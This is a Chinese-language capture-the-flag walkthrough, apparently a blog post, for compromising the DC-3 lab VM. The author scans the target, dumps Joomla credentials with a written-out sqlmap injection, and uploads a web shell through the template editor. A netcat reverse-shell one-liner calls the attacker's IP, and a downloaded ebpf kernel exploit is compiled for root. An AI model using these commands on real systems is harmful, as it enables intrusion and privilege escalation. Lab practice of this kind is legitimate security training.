實驗環境
- Vmware workstation
- kali2020
- DC-3
- DC-3靶機網卡和kali是一樣的
- kali 的ip地址:192.168.6.129
主機發現
sudo arp-scan -l
發現怎么都找不到靶機ip
修復錯誤配置
看到這個頁面按e
將這里的ro 替換為 rw signie init=/bin/bash
按下Ctrl鍵+X鍵進入命令行,查看當前網卡IP信息 ip a,網卡名ens33
編輯網卡配置文件vim /etc/network/interfaces(原先的網卡名不一致)
重啟網卡服務/etc/init.d/networking restart,在看看ip a
這樣就有ip了。
主機再發現
發現192.168.6.133的ip已經能被掃到了。
信息收集
nmap -A -T4 -p- 192.168.6.133
開放了80端口,用的joomla! CMS
進一步收集
利用msf工具掃描出對應的版本信息
獲取網站管理員的用戶名和密碼
利用searchsploit查找針Joomla 3.7 的漏洞
searchsploit joomla 3.7.0
發現存在sql注入
查看對應的文件中的攻擊方式說明
執行文件中sqlmap語句進行爆庫
sqlmap -u "http://192.168.6.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C username,password --dump -p list[fullordering]
成功獲取用戶名和密碼的hash,接下來就是破解
用kali的john,先用vim hash 把hash寫進去,再用John
密碼:snoopy
賬號:admin
發現沒什么東西,應該是要從后台進入。我剛剛用direash已經掃描出了后台目錄。http://192.168.6.133/administrator/
取得shell並提權
上傳文件獲取反彈shell
點擊Extensions — Templates — Beez3 Details and Files
在template欄中發現可以寫文件和上傳文件。我們可以寫一個小馬上傳上去。記得保存。
使用蟻劍進行連接。
NC反彈
使用nc進行反彈shell。
kali本機監聽 4444端口
nc -lvvp 4444
蟻劍虛擬終端中
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.6.129 4444 >/tmp/f
反彈成功
提權
現在不是root權限,需要進行提權。查看系統信息。
看一下漏洞
searchsploit ubuntu 16.04
使用39772進行提權,
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
下載exp:
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
總是失敗
都無法建立SSL連接,傻掉
然后我又白白瞎搞了一個多小時沒效果,然后想在本地物理機下載,結果發現raw.githubusercontent.com 的服務器 IP 地址換了,我瞬間感覺自己好白痴。
在/etc/hosts添加
# Github Start 52.74.223.119 github.com 192.30.253.119 gist.github.com 54.169.195.147 api.github.com 185.199.111.153 assets-cdn.github.com 199.232.96.133 raw.githubusercontent.com
然后就下載成功了,啊呀,好煩。
然后我們繼續,
unzip 39772.zip cd 39772 tar –xvf exploit.tar cd ebpf_mapfd_doubleput_exploit ./compile.sh ./doubleput
在root目錄下拿到flag